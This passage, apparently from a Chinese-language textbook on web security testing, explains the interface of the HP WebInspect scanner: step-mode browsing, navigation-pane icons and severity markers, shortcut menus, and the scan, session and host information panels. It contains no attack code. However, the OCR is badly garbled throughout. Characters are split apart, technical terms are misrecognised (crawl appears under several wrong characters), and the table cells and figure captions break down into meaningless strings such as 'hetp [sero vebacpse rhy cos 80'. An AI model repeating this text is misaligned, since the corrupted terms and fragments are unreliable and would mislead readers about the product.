* Response Header Name( 响 应 头 名 称 ) 

* Response Header Value( 响 应 标 头 值 ) 

* Response Cookies( 响 应 的 Cookie) 

* Response Cookie Name( 响 应 的 Cookie 名 称 ) 
* Response Cookie Value( 响 应 的 Cookie 值 ) 

3) 在 组 合 框 中 ， 键 入 或 选择 要 查找 的 字符 串 。 


4) 如 果 该 字符 串 代 表 一 个 正则 表达 式 ， 则 选择 Regular Expression( 正 则 表达 式 ) 复 选 框 。 
5) 在 HITP 消息 中 要 查找 完全 匹配 的 整个 字符 串 ， 需 要 选择 Match Whole String( 匹 配 整 
个 字符 串 ) 复 选 框 ， 精 确 匹 配 不 区 分 大 小 写 。 


注意 : 


4. 步 


该 选项 不 适用 于 某 些 搜索 目标 。 
6) 单 击 Search( 搜 索 )。 


模式 


使 用 步 模式 手动 浏览 整个 网 站 ， 从 网 站 视图 或 序列 视图 中 选择 一 个 会 话 开始 。 


按照 下 面 的 步骤 逐步 浏览 网 站 : 


1) 在 网 站 视图 或 序列 视图 中 ， 选 择 一 个 会 话 。 

2) 单 击 Step Mode( 步 模式 ) 按 钮 。 如 果 按 钮 不 可 见 ， 请 单 击 Configure Buttons( 配 置 按钮) 
的 下 拉 菜 单 ， 然 后 选择 Show More Buttons( 显 示 更 多 按钮 )。 

3) 当 步 模式 显示 在 导航 窗 格 中 ， 从 Audit Mode 列表 选择 Audit as you browse( 浏 览 审 计 ) 
或 Manual Audit( 手 动 审计 )。 建 议 选择 后 者 ， 如 图 10-9 所 示 。 


Step Mode 


Audt Mode: Manualaudt ~| 


Manual Audit 


C) (ei d 


图 10-9 步 模 式 中 选择 手动 审计 
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4) 单 击 Record( 记 录 )Ls]。 

5) 单 击 Browse( 浏 览 )。 

浏览 器 会 开启 并 显示 与 所 选 会 话 相 关联 的 响应 ， 继 续 浏 览 尽 可 能 多 的 页 面 。 

6) 完成 后 ， 返 回 WebInspect 并 单 击 Finish( 完 成 )， 新 的 会 话 被 添加 到 导航 窗 格 中 。 

7) 如 果 在 步骤 3 中 选择 Manual Audit( 手 动 审计 )， 单 击 国 as。WebImspect 将 审计 所 有 
未 经 审计 的 会 话 ， 包 括 用 户 通过 步 模式 添加 (或 更 换 ) 的 审计 。 

5. 导航 窗 格 中 的 图 标 


使 用 表 10-1 和 表 10-2 来 识别 序列 视图 和 网 站 视图 中 显示 的 资源 。 


表 10-1_ 在 导航 窗 格 使 用 的 图 标 


Bod Eox 

5 服务 器 /主机 ， 代 表 网 站 树 状 结构 的 项 层 

| EXMA: 由 Weblnspect 发 现 的 用 户 Web 服务 器 上 的 私人 文件 夹 。 这 些 文件 来 
和 网 站 本 身 没 有 关系 

E3 黄色 文件 夹 : 文件 夹 的 内 容 在 网 站 上 都 可 以 用 

E3 灰色 文件 夹 :用 于 指明 该 条 目 通过 路 径 截 断 发 现 一 个 文件 夹 。 一 旦 父 文件 夹 (上 一 


级 文件 夹 ) 被 发 现 ， 它 的 属性 决定 了 该 文件 来 将 显示 为 落 色 或 黄色 
D 文件 

B 请 求 或 发 送 

o DOM 事件 


310-2 RAME- ^4 sc tct Ee A Xu 
E X 
一 个 红色 的 惊叹 号 表示 该 对 象 包含 一 个 严重 漏洞 。 攻 击 者 可 在 服务 器 上 执行 命令 ， 
如 检索 或 修改 个 人 信息 
红 点 表示 的 对 象 包含 一 个 高 级 漏洞 。 一 般 来 说 ， 能 够 查看 源 代码 、 文 件 的 Web 根 目 
录 和 敏感 的 错误 消息 


金 点 表示 该 对 象 包含 一 个 中 等 漏洞 。 这 些 都 是 一 般 的 敏感 的 非 HIML 错误 或 问题 


蓝 点 表示 对 象 包 含 低 等 漏洞 。 这 些 一 般 都 是 需要 关注 的 问题 ， 或 可 能 成 为 更 高 的 漏洞 
在 一 个 蓝 色 圆 圈 中 的 “i” 表 示 一 个 信息 项 。 这 些 都 是 网 站 中 需要 关注 的 点 ， 或 特定 
的 应 用 程序 或 Web 服务 器 


红色 的 复 选 标 记 表明 违反 “最 佳 实践 (Best Practice)” 
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每 个 对 象 都 代表 一 个 会 话 ， 这 是 一 个 匹配 的 集合 ， 包 括 : WebInspect 发 送 HTTP 请 求 去 
检测 漏洞 以 及 来 自 服务 器 的 HTTP 响应 。 
6. 导航 窗 格 中 的 快捷 菜单 


右键 单 击 会 话 (在 导航 窗 格 中 的 条 目 )， 显 示 表 10-3 中 所 描述 命令 的 快捷 菜单 。 


® T 


X103 导航 窗 格 快捷 命令 


E X 


Expand Children( 自 动 扩展 子 
级 ) 


展开 分 支 网 站 中 的 树 节点 ( 仅 适用 于 网 站 视图 ) 


Collapse Children * P : ý : 
合并 分 支 网 站 到 上 级 节点 ( 仅 适 用 于 网 站 视图 ) 
MATE) 
Check All*( 查 看 全 部 ) 标记 所 有 子 集 的 复 选 框 ( 仅 适用 于 网 站 视图 ) 
UnCheck All*( 全 部 取消 ) 从 所 有 子 集中 删除 复 选 标记 ( 仅 适 用 于 网 站 视图 ) 
Generate Session * Report* 创建 一 个 报告 ， 显 示 摘 要 信息 、 攻 击 请 求 和 攻击 响应 、 链 接 和 网 址 、 注 释 、 
(生成 会 话 报告 表格 以 及 电子 邮件 地 址 ， 并 为 所 选 会 话 检查 说 明 ( 仅 适用 于 网 站 视图 ) 
Export Site Tree * Sie x Y - 
XML 格式 的 网 站 树 保存 到 用 户 具 体 指定 的 某 个 位 置 ( 仅 适 用 于 网 站 视图 ) 
(导出 网 站 树 ) 
将 选 定 会 话 的 URL 复制 到 剪贴 板 ， 选 择 Edit C. 编辑 一 复制 
Copy URL( 复 制 网 直 ) "ae dba 
URL) 
View in Browser TS z " 
Ns 在 浏览 器 中 显示 Web 服务 器 的 响应 
(浏览 器 视图 ) 
列 出 目标 网 站 的 所 有 资源 ， 包 括 选 定 资源 的 链接 ( 仅 适用 于 网 站 视图 )。 这 
些 链接 可 以 通过 HTML 标签 、 脚 本 或 HIML 形式 呈现 。 它 还 列 出 由 选 定 
. 会 话 的 HTTP 响应 中 的 链接 所 引用 的 所 有 资源 。 
Links( 链 接 ) : . 
如 果 用 户 双击 一 个 链接 ，WebInspect 可 将 焦点 转移 到 导航 窗 格 中 所 引用 的 
会 话 。 或 者 ， 也 可 以 在 Web 浏览 器 中 通过 查看 会 话 浏览 该 链接 资源 ( 单 击 
Web Browser 
Aadgisin) 允许 添加 WebInspect 扫描 的 其 他 地 点 发 现 (人 工 检查 ， 其 他 工具 等 ) 以 供 参 
i 考 。 此 外 ， 用 户 可 以 添加 漏洞 位 置 ， 对 网 站 进行 完整 分 析 
Edit Vulnerability( 编 辑 漏洞) | 允许 编辑 被 手动 添加 的 漏洞 或 编辑 漏洞 的 位 置 
Remove Location 从 导航 窗 格 (包括 网 站 和 序列 视图 ) 删 除 选 定 会 话 ， 并 删除 任何 相关 漏洞 。 
(删除 位 置 ) 注意 : 用 户 可 以 恢复 删除 位 置 (会 话 ) 及 其 相关 的 漏洞 
Crawl( 他 行 ) 重新 息 行 选 定 的 URL 
Review Vulnerability 允许 用 户 重新 测试 该 漏洞 ， 将 其 标记 为 “忽略 ”或 “ 误 报 ”， 或 发 送 到 
(审阅 漏洞 ) HP 质量 中 心 或 IBM Rational ClearQuest 
Mark as False Positive 


CAIRPRE) 


标记 漏洞 作为 误 报 ， 并 允许 用 户 添加 注释 
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GK 

® 4 定 义 
Remove Server 从 导航 窗 格 中 删除 服务 器 ， 不 包括 任何 剩余 扫描 活动 的 服务 器 。 当 右键 单 
(出 除 服务 器 ) 击 服务 器 时 ， 此 命令 才 会 显示 
Attachments 允许 创建 与 选 定 会 话 相关 的 说 明 、 标志 的 会 话 跟 进 , 或 增加 一 个 漏洞 说 明 ， 
UHD 或 添加 一 个 漏洞 快照 
Tools( 工 具 ) 介绍 可 用 工具 的 子 菜单 
pos dmm 过 滤 摘 要 窗 格 所 选 会 话 的 摘要 数据 ID 条 目 
(当前 会 话 过 滤器 ) 

? 对 于 一 个 缺陷 , 允许 用 户 转换 选 定 漏洞 ,并 发 送 到 HP 质量 中 心 或 IBM Rational 
Send to( 发 送 到 ) 


ClearQuest， 使 用 WeblInspect 应 用 程序 设置 中 指定 的 配置 文件 
备注 ， 只 有 在 导航 窗 格 使 用 本 网 站 视图 时 ，* 命 令 才 显 示 在 快捷 菜单 上 。 


102.3 ”信息 窗 格 


在 进行 或 查看 扫描 时 ， 信 息 窗 格 包 含 三 个 可 折 欠 的 信息 板 和 一 个 信息 显示 区 。1 代表 扫 
描 信息 面板 (Scan Info Panel), 2 代表 会 话 信息 面板 (Session Info Panel), 3 代表 主机 信息 面板 
(Host Info Panel)，4 代表 信息 显示 区 (Information Display Area)， 如 图 10-10 所 示 。 


Scan Info 3E ad FN session vulnerabilities: http:/ /zero.webappsecurity.com:80/login1.asp 


© Dashboard, 
Enotes o 
iri seta Multiple Vulnerabilities Were Found 
Session Info A 

E ]web Browser. 

[Š HTTPRequest 

[$ HTTPResponse. 


El Detaits 


P Links —— 
A Text 


Scripts 
Enotes 
|] Attack Info ng Wzing 
tabat 


nces the meai 


图 10-10 信息 窗 格 的 三 个 可 折 针 的 信息 板 和 一 个 信息 显示 区 
通过 单 击 左 栏 中 三 个 信息 面板 之 一 的 某 个 条 目 选择 显示 信息 类 型 。 
1. 扫描 信息 面板 
* Scan Info( 扫 描 信息 ) 面 板 有 5 个 默认 选项 : Dashboard( 仪 表 板 )、Traffic Monitor( 流 量 
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监控 器 )、Recommendations( 注 意 事 项 )、Attachments( 附 件 ) 和 False Positives( 误 报 )。 


仪表 板 显示 对 实时 扫描 结果 的 汇总 和 用 图 形 表示 的 扫描 进展 ， 如 图 10-11 所 示 。 


Crawl Gauge( 息 行 统计 ):， 扑 行 会 话 数 / 仆 行 会 话 总 数 。 
Audit Gauge( 审 计 统 计 ): 审计 会 话 数 /审计 会 话 总 数 。 
Scan Status( 扫 描 状态 ): 状态 包括 正在 运行 、 和 暂停 或 完成 。 
Crawling Req/Sec( 仆 行 请 求 / 秒 ): 疏 行 当前 网 络 运行 的 每 秒 请 求 数 (运行 步 长 为 $ 秒 )。 
Auditing Req/Sec( 审 计 请 求 / 秒 ): 审计 当前 网 络 运行 的 每 秒 请 求 数 (运行 步 长 为 5 秒 )。 
Script Evt/Sec( 脚 本 事件 / 秒 )， 正 在 被 执行 的 脚本 事件 数 (运行 步 长 为 5 秒 )。 
Vulnerability Graph( 漏 洞 走势 图 ): 各 类 级 别 中 已 确定 为 问题 的 总 数 。 

Attack Stats Grid( 攻 击 数据 网 格 ): 统计 攻击 和 发 现 的 问题 ， 以 及 攻击 类 型 和 审计 引 
擎 的 数量 。 

Duration( 时 间 ): 扫描 已 经 运行 的 时 间 长 度 ( 如 果 扫 描 异 常 终 上 ， 可 能 不 正确 )。 


«ch 


图 10-11 仪表 板 


Policy( 政 策 ): 用 于 扫描 策略 的 名 称 。 

Hosts( 主 机 ): 包括 正在 扫描 的 主机 数 。 

Sessions(Z&i&): 会 话 总 数 (不 包括 AJAX 请 求 ， 包 括 脚本 和 脚本 框架 ， 包 含 WSDL). 
Attacks Sent( 攻 击发 送 )， 发 送 攻击 总 数 。 

Issues( 问 题 ):， 问 题 发 现 总 数 (所 有 漏洞 ， 以 及 最 佳 实践 )。 

Total Requests( 总 要 求 ); 提出 请 求 的 总 数 。 

Failed Requests( 失 败 请 求 ):， 失败 的 请 求 总 数 。 

Script Includes( 脚 本 包括 ): 包括 脚本 的 总 数 。 

Macro Requests( 宏 请 求 ): 宏 请 求 数 。 
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* 404 Probes(404 探头 ): 文件 未 找到 探测 器 的 数量 来 确定 文件 未 找到 状态 。 

* 404 Check Redirects(404 重 定向 检查 ): 导致 重 定 向 404 探头 的 次 数 。 

* Verify Requests( 验 证 请 求 ); 检测 存储 参数 的 请 求 。 

* Logouts( 注 销 ): 注销 检测 次 数 和 登录 宏 执行 。 

* Macro Playbacks( 宏 回放 ): 已 经 执行 宏 的 次 数 。 

* AJAX Requests(AJAX 请 求 )，AJAX 请 求 总 数 。 

* Kilobytes Sent( 发 送 千 字 节 总 数 )， 发 送 千 字 节 总 数 。 

* Kilobytes Received( 接 收 千 字 节 总 数 ): 收 到 千 字 节 总 数 。 

注释 : 指出 选择 显示 所 有 注释 的 列表 ， 每 一 个 都 与 特定 的 会 话 相 关联 。 双 击 一 个 报告 显 
示 其 内 容 ， 如 图 10-12 所 示 。 

在 导航 窗 格 中 ，WebInspect 通常 只 显示 那些 揭示 网 站 层次 结构 的 会 话 ， 以 及 漏洞 会 被 发 
现 的 会 话 。 流 量 监控 器 选择 允许 显示 和 评估 每 个 HTTP 请 求 发 送 的 WebInspect， 和 从 服务 器 
接收 到 HTTP 相关 的 响应 。 要 显示 此 选项 , 则 必须 选择 Enable Traffic Monitor Logging( 启 用 流 
量 监控 日 志 )， 在 默认 设置 单 击 Edit Default Settings( 编 辑 一 默认 设置 )， 然 后 ， 在 扫描 设置 类 
别 中 ， 选 择 General( 一 般 )， 如 图 10-13 所 示 。 


Edit View x Delete 


| Associated With 


Description 


图 10-12 注释 列表 


图 10-13 流量 监控 


该 附件 选项 显示 所 有 已 添加 到 扫描 列表 的 会 话说 明 、 漏 洞 说 明 、 随 访 标志 和 漏洞 截图 。 
每 个 附件 都 与 一 个 特定 的 会 话 相关 联 。 此 外 还 列 出 了 扫描 说 明 (说 明 适 用 于 整个 扫描 , 而 不 是 
某 个 特定 的 会 话 )。 
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用 户 可 以 创建 一 个 扫描 说 明 ， 或 者 编辑 或 删除 现 有 的 附件 。 

查看 附件 。 请 选择 附件 ， 然 后 单 击 View( 视 图 )( 或 直接 双击 附件 )。 

创建 一 个 扫描 说 明 。 单 击 Add( 添 加 ) 菜 单 (在 信息 显示 区 )。 

编辑 附件 。 选 择 附件 ， 然 后 单 击 Edit( 编 辑 )。 注 意 ， 截 图 不 能 编辑 。 

可 通过 右键 单 击 Attachments( 附 件 ), 然后 从 快捷 菜单 中 选择 对 应 选项 。 也 可 以 选择 Go to 
session( 前 往 会 话 )， 这 将 打开 会 话 信息 附件 窗 格 ， 选 择 与 该 附件 相关 联 的 会 话 。 

要 选择 在 WebInspect 用 户 界面 的 其 他 区 域 创建 的 附件 ， 可 右键 单 击 导航 窗 格 中 的 会 话 ， 
然后 从 快捷 菜单 中 选择 附件 ， 或 右键 单 击 摘要 窗 格 中 漏洞 选项 卡 上 的 网 址 ， 然 后 从 快捷 菜单 
中 选择 附件 。 

此 功能 列 出 WebInspect 原本 标记 为 漏洞 的 所 有 URL, 但 后 来 用 户 确定 有 些 URL 是 误 报 。 
也 可 将 先前 的 分 析 作为 误 报 的 扫描 漏洞 列表 进行 导入 。 然 后 在 当前 扫描 中 用 WebInspect 关联 
这 些 从 先前 漏洞 检测 到 的 扫描 ， 并 标 出 新 出 现 的 误 报 。 

1) 从 扫描 信息 面板 中 选择 False Positives( 误 报 )， 如 图 10-14 所 示 。 

2) 如 有 必要 ， 单 击 漏洞 描述 的 加 号 ， 以 显示 相关 的 URL 和 状态 。 

3) 单 击 一 个 URL 查看 评论 (位 于 信息 窗 格 的 底部 )。 


y - Edit Description É Import False Positives 


Description 


K 10-14 误 报 


4) 要 从 其 他 扫描 导入 误 报 ， 单 击 Import Scans( 导 入 扫描 )。 
5) 要 更 改 误 报 并 返回 一 个 漏洞 ， 从 活动 误 报 列表 中 选择 一 个 条 目 ， 然 后 单 击 Mark as 


Vulnerability( 标 记 为 漏洞 )。 
6) 要 从 暂 无 误 报 列表 中 删除 某 个 条 目 ， 选 择 该 条 目 ， 然 后 单 击 Remove From Inactive( 非 
活动 删除 )。 


7) 要 编辑 与 误 报 关联 的 注释 ， 选 择 该 条 目 ， 然 后 单 击 Edit Comment( 编 辑 评论 )。 

2. 会 话 信息 面板 

在 导航 窗 格 使 用 网 站 视图 或 序列 视图 ，WebInspect 列 出 每 个 会 话 期 间 创建 的 扫描 。 选 择 
一 个 会 话 ， 然 后 单 击 会 话 信息 面板 中 的 选项 之 一 ， 以 显示 有 关 会 话 相关 的 信息 ， 如 图 10-15 
所 示 。 
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I 六 Session Vulnerabilities: http:/ /zero.wehappsecurity.com/ admin/ 


Multiple Vuinerabiities Were Found 


Summary. Access Controk Unprotected Fie 


图 10-15 会 话 信息 面板 


下 面 例子 的 扫描 中 ，WebInspect 发 送 HTTP 请 求 GET/stats/ HITP/1.1。 要 查看 HTTP 响 
应 ， 可 执行 以 下 步骤 。 

1) 在 导航 窗 格 中 选择 Stats html。 

2) 单 击 会 话 信息 面板 中 的 Vulnerability( 漏 洞 )。 

表 10-4 列 出 了 在 会 话 信息 面板 中 可 用 的 选项 。 有 些 选项 只 出 现在 特定 的 扫描 (向 导 扫 描 、 
基础 扫描 或 Web 服务 扫描 ) 中 。 此 外 ， 当 上 且 仅 当 它们 是 相关 的 所 选 会 话 ， 才 能 启用 选项 ， 例 
如 ， 如 果 会 话 不 包含 表单 ，Forms( 表 单 ) 选 项 不 可 用 。 


表 10-4_ 会话 信 息 面板 选项 


选 项 定 义 
Vulnerability (漏洞 ) | 显示 导航 窗 格 中 所 选 会 话 的 漏洞 信息 
Web Bi 
pli 在 导航 窗 格 中 ， 通 过 Web 浏览 器 显示 服务 器 对 所 选 会 话 的 响应 
(Web 浏览 器 ) 
HTTP Request . " . n Ld 
Sich 显示 由 WebInspect 发 送 到 主机 要 扫描 的 目标 网 站 服务 器 的 原始 HTTP 请 求 
(HTTP 请 求 ) 
显示 服务 器 的 原始 HTTP 响应 的 WeblInspect 请 求 。 如 果 响 应 包含 一 个 或 多 个 攻击 
AGIR INIRE, ppt CB 区 >， 标 记 从 一 个 攻击 信号 到 下 
HTTP Response 
i 一 个 攻击 信号 。 
(HTTP 响应 ) 
注意 : 如 果 选 择 一 个 Flash(SWF) 文 件 ，WebInspect 可 以 显示 HIML， 而 不 是 二 进 
制 数据 。 这 使 得 WebInspect 以 可 读 格式 显示 链接 
此 功能 的 设计 ， 可 支持 HP Fortify SecurityScope 安装 和 运行 在 目标 服务 器 上 。 
sil 对 于 某 些 检查 (如 SQL 注入 、 命 令 执 行 和 跨 网 站 脚本 )，SecurityScope 拦截 
t: 
GNE WebInspect 的 HTTP 请 求 ， 并 在 目标 模块 运行 时 进行 分 析 。 如 果 这 个 分 析 证 实 存 
CIERRE) 


在 一 个 漏洞 ，SecurityScope 追加 堆栈 来 跟踪 HTTP 响应 。 开 发 人 员 可 分 析 这 个 堆 
栈 跟 踪 来 调查 需要 修复 的 区 域 

Details( 详 细 信 息 ) 显示 请 求 及 响应 的 详细 信息 列表 ， 如 响应 程度 和 请 求 方法 

Comments( 评 论 ) 显示 所 有 嵌入 在 HTTP 响应 中 的 评论 
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( 续 表 ) 
选 项 E X 
"T 在 导航 窗 格 或 选择 的 URL 摘要 窗 格 中 ， 显 示 采 用 WebInspect 到 达 选 定 会 话 的 路 
QE) 线 。 从 父 会 话 (上 一 级 会 话 ) 开 始 ， 该 序列 包括 了 后 续 访 问 的 URL， 并 提供 了 有 关 
扫描 方法 的 细节 
Tm 列 出 (在 链接 下 ) 目 标 网 站 包含 的 全 部 所 选 链接 资源 。 可 以 通过 HTML 标签 、 脚 本 
: 或 HTML 形式 呈现 这 些 链接 。 它 还 列 出 由 所 选 会 话 的 HTTP 响应 的 链接 所 引用 
bun 的 所 有 资源 
Text( 文 本 ) 显示 包含 在 HITP 响应 中 的 所 有 文本 
了 ddens( 隐 藏 ) 显示 每 个 输入 元 素 控制 类 型 的 名 称 是 “隐藏 ” 
Forms( 表 格 ) 显示 通过 浏览 器 来 呈现 HTML 形式 的 解释 
E-mail( 电 子 邮 什 ) 显示 包含 在 响应 中 的 所 有 电子 邮件 地 址 
Scripts( 脚 本 ) 显示 嵌入 在 服务 器 响应 中 的 所 有 客户 端 脚本 
显示 攻击 序列 号 码 、URL、 审 计 引 擎 的 名 称 以 及 脆弱 性 (漏洞 ) 试 验 的 结果 。 如 果 
Jeder 选择 重新 检查 , WebInspect 可 启动 HTTP 编辑 器 , 允许 用 户 重 新 发 送 相关 的 HTTP 
Citi) 请 求 。 进 行 扫描 时 ， 此 功能 是 最 常用 的 ， 以 确定 是 否 该 漏洞 已 经 得 到 修正 。 
攻击 信息 通常 与 创造 该 攻击 的 会 话 (而 不 是 检测 到 的 会 话 ) 相 关联 。 如 果 攻 击 信息 
没有 出 现 所 选 脆弱 的 阶段 ， 选 择 上 一 级 会 话 
显示 所 有 注释 、 标 志和 与 所 选 对 象 相关 联 的 截图 。 
要 创建 注释 ， 用 户 可 以 : 
右键 单 击 导航 窗 格 中 的 会 话 ， 然 后 从 弹出 的 菜单 中 选择 注释 。 
Attachment 右键 单 击 摘要 窗 格 中 的 漏洞 选项 卡 上 的 URL， 然 后 从 弹出 菜单 中 选择 注释 。 
(HIT) 首先 选择 导航 窗 格 中 的 会 话 , 然后 选择 会 话 信息 面板 注释 , 继而 单 击 添加 菜单 (在 
信息 窗 格 中 )。 
只 要 向 惠普 质量 中 心 或 BM Rational ClearQuest 发 送 一 个 缺陷 ，WebInspect 会 自 
动 给 会 话 信息 添加 一 条 注释 
pgs SETA FER IE Web 服务 评估 选择 的 WSDL 对 象 时 可 用 ) 中 的 XML 架构 
(XML 请 求 ) 
XML Response 
显示 人 嵌入 在 响应 (在 Web 服务 评估 选择 的 WSDL 对 象 时 可 用 ) 中 的 XML 架构 
(XML 响应 ) 
Web Service 
Request 显示 Web 服务 架构 和 嵌入 的 请 求 值 (在 Web 服务 扫描 中 可 用 ) 
(Web 服务 请 求 ) 
Web Service 
Response 显示 Web 服务 架构 和 嵌入 的 响应 值 (在 Web 服务 扫描 中 可 用 ) 


(Web 服务 响应 ) 
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大 多 数 选项 在 信息 窗 格 项 部 提供 了 搜索 功能 ， 方 便 用 户 找到 指定 的 文本 。 要 使 用 正则 表 
达 式 进行 搜索 ， 在 单 击 Find( 查 找 ) 之 前 选择 Regex( 正 则 表达 式 ) 选 项 。 

注意 : 查看 漏洞 信息 时 ， 如 果 要 打开 链接 ， 请 在 导航 窗 格 中 单 击 突出 显示 的 会 话 。 

3. 主机 信息 面板 


当 单 击 可 折 革 面板 中 列 出 的 任意 条 目 ，WebInspect 显示 网 站 (或 主机 ) 疏 行 或 审计 过 程 中 
发 现 该 条 目 类 型 的 所 有 实例 。 例 如 ， 如 图 10-16 所 示 ， 用 户 选择 主机 信息 面板 中 的 Cookie; 
WebInspect 将 列 出 Cookie 的 所 有 会 话 。 表 10-5 列 出 了 主机 信息 面板 选项 。 


表 10-5 主机 信息 面板 选项 
E xXx 

WebInspect 列 出 在 扫描 过 程 中 发 现 的 所 有 电子 邮件 地 址 
WebInspect 列 出 在 扫描 过 程 中 发 现 的 所 有 HIML 表单 
万 维 网 联盟 的 个 人 隐私 安全 平台 项 目 P3P) 用 网 站 的 标准 格式 来 阐述 常见 的 个 
人 隐私 , 用 户 代理 可 自动 检索 且 容 易 理解 。 P3P 用 户 代理 允许 用 户 在 已 知 网 站 
进行 操作 (在 机 器 和 人 类 的 可 读 格式 下 ), 在 适当 的 时 候 基于 这 些 操作 进行 自动 
化 决策 。 因此 ,用户 可 以 不 必 查 看 他 们 访问 每 个 网 站 的 隐私 策略 。P3P 官方 网 
站 声明 了 一 个 关于 如 何 收集 和 使 用 这 些 信息 的 方案 。 支持 P3P 的 Web 浏览 器 
可 以 通过 这 一 方案 与 用 户 的 存储 偏好 相 比较 来 决定 该 怎么 做 。 例 如 ， 用 户 可 
以 设置 浏览 器 偏好 ， 以 便 他 们 浏览 习惯 的 信息 不 被 收集 。 当 用 户 在 随后 访问 
网 站 的 策略 中 规定 一 个 Cookie 被 用 于 此 目的 时 ， 浏 览 器 会 自动 拒绝 该 Cookie 
AJAX 是 异步 JavaScript 和 XMLHttpRequest 的 缩写 。 如 果 选 择 此 选项 ， 
WebInspect 可 以 显示 包含 一 个 AJAX 引擎 的 所 有 页 面 ,以 及 AJAX 请 求 .AJAX 
并 不 是 技术 本 身 ， 而 是 结合 现 有 技术 , 包括 HTML £X XHTML, CSS 样式 表 、 
JavaScript、 文 档 对 象 模型 、XML、XSLT fil XMLHttpRequest 对 象 的 组 合 。 当 
这 些 技术 结合 在 AJAX 模型 中 时 ，Web 应 用 程序 都 能 够 快速 、 增 量 式 更 新 济 
览 器 的 用 户 界面 ， 而 不 必 重 新 加 载 整个 页 面 而 不 是 在 会 话 开始 加 载 一 个 网 页 ， 
浏览 器 首先 加 载 AJAX 引擎 ， 以 便 呈现 用 户 界面 ， 以 及 与 服务 器 通信 。 每 个 
用 户 操作 ， 通 常会 产生 一 个 HTTP 请 求 ， 它 需要 有 AJAX 引擎 的 JavaScript 
来 代替 ， 而 不 需要 与 服务 器 (如 简单 的 数据 校 验 ， 内 存 中 的 数据 编辑 ， 甚 至 一 
些 导航 ) 通 信 ， 因 此 用 户 动作 的 任何 响应 都 由 引擎 处 理 。 如 果 引 擎 需要 与 服务 
器 通信 一 一 提交 数据 进行 处 理 ， 加 载 额 外 的 界面 代码 ， 或 者 获取 新 数据 一 一 
引擎 通常 使 用 XML 让 这 些 请 求 异 步 发 送 
证 书 指出 ， 一 个 特定 的 网 站 是 安全 的 和 真实 的 。 它 确保 没有 其 他 网 站 可 以 伪 
造 原始 安全 网 站 的 标识 。 当 通过 Intemet 发 送 个 人 信息 时 ， 用 户 应 该 检查 该 网 
站 的 证 书 ， 以 确保 它 会 保护 个 人 身份 信息 。 当 从 网 站 下 载 软件 时 ， 证 书 验 证 
该 软件 是 否 来 自 一 个 已 知 的 可 靠 来 源 。 
证 书 与 公 钥 的 身份 相关 联 。 该 证 书 只 有 拥有 者 知道 相应 的 私有 密 钥 ， 这 使 得 
拥有 者 可 以 做 一 个 “数字 签名 ”或 使 用 相应 的 公 钥 加 解密 信息 


选 项 
E-mails( 电 子 邮件 ) 
Forms( 表 单 ) 


P3P Info(P3P 信息 ) 


AJAX 


Certificates( 证 书 ) 
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E) 
选 项 定义 
Comments( 评 论 ) 通常 情况 下 ， 开 发 人 员 在 注释 中 留 下 的 重要 信息 ， 可 能 会 破坏 网 站 的 安全 性 
Webluspect 分 析 所 有 形式 ， 然 后 列 出 类 型 为 “隐藏 ”( 即 控制 那些 没有 演 染 
Hiddens( 隐 天 但 其 值 用 表单 提交 ) 的 所 有 控件 。 开 发 人 员 通常 使 用 的 参数 隐藏 控件 可 被 攻击 
者 编辑 后 重新 提交 
Cookies 包含 存 储 在 客户 端 上 以 供 将 来 交互 的 信息 (如 用 户 首选 项 或 配置 信 
me E). Cookies 存在 两 种 基本 形式 ， 作 为 单独 文件 或 者 是 一 个 连续 的 文件 记录 。 
通常 是 多 个 被 安装 在 不 同位 置 的 浏览 器 产生 信息 的 集合 。 许 多 情况 下 ， “被 
HESIN” Cookies 包含 用 户 不 希望 别人 看 到 的 信息 
T 脚本 是 基于 浏览 器 中 的 输入 请 求 ， 在 服务 器 上 运行 和 处 理 的 程序 。WebInspect 
可 跟踪 全 个 脚本 ， 运 行 并 列 出 信息 选项 卡 上 的 所 有 脚本 
Broken Links( 断 开 的 链 " vd PR E 
D Weblnspect 可 发 现 并 记录 网 站 上 的 所 有 处 于 非 工 作 状态 的 超 链接 
De Weblnspect 可 发 现 并 记录 所 有 到 其 他 网 站 的 超 链接 
(FEBER 
Weblnspect 可 发 现 并 记录 在 扫描 过 程 中 过 到 的 所 有 参数 。 参 数 是 在 HTTP 请 
了 Parameters( 参 数 ) 


求 中 提交 的 URL 的 一 部 分 查询 字符 中 或 者 使 用 POST 方法 提交 的 数据 


双击 列表 中 的 条 目 ，WebInspect 可 在 导航 窗 格 中 突出 显示 包含 该 条 目的 会 话 。 用 户 可 通 
过 突出 显示 文本 ， 从 快捷 菜单 中 选择 Copy( 复 制 ) 将 条 目 (如 电子 邮件 地 址 ) 复 制 到 剪贴 板 。 
注意 : 在 进行 Web 服务 扫描 时 ， 主 机 信息 面板 不 显示 。 
大 多 数 情况 下 ， 用 户 可 在 信息 窗 格 项 部 使 用 搜索 功能 找到 指定 的 文本 。 要 使 用 “正则 表 
达 式 ”进行 搜索 ， 单 击 Find( 查 找 ) 之 前 选择 Regex( 正 则 表达 式 ) 选 项 。 
om e ET 


asperen teetan. 


hetp [sero vebacpse rhy cos 80 erlbgr espar reinvaic™ 23 
hetp /feero webacpse rty cow 0| coditestsetCoclies ap. 


hetp ceo webacpse rty cos S'erlibgrs ssp er rvai 2 or 
ips [ceo webacpse rty con 0 erlbgr sp 'ereval 2 oon 
htp zero webacpserly cov 80r asp. 


图 10-16 主机 信息 面板 中 的 Cookies 
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10.2.4 HEAR 


在 进行 或 查看 扫描 时 ， 使 用 位 于 窗口 底部 的 水 平 摘要 窗 格 可 显示 发 现 的 全 部 漏洞 ， 从 而 可 
以 快速 访问 漏洞 信息 和 查看 WebInspect 记录 信息 。 此 窗 格 有 6 个 选项 卡 ， 如 图 10-17 所 示 。 


a Qi 


图 10-17 摘要 窗 格 的 6 个 选项 卡 


* 漏洞 (Vulnerabilities) 

© 未 发 现 (Not Found) 

。 信息 (Infonmation) 

。 最 佳 实践 (Best Practices) 

。 扫描 日 志 (Scan Log) 

。 服务 器 信息 (Server Information) 

1. 漏洞 选项 卡 

该 漏洞 选项 卡 列 出 了 审计 期 间 在 网 站 上 发 现 的 所 有 漏洞 。 

如 果 要 选择 显示 的 信息 ， 从 快捷 菜单 中 右键 单 击 列 标题 栏 选 择 Columns( 列 )， 如 图 10-18 

所 示 。 

可 用 列 如 下 : 

。 严重 性 (Severity): 该 漏洞 的 相对 评价 ， 从 低 到 高 。 请 参阅 下 面 的 相关 图 标 。 

。 检查 (Check): WebInspect 可 探测 特定 的 漏洞 ， 例 如 跨 网 站 脚本 ， 未 加 密 的 日 志 通 知 等 。 

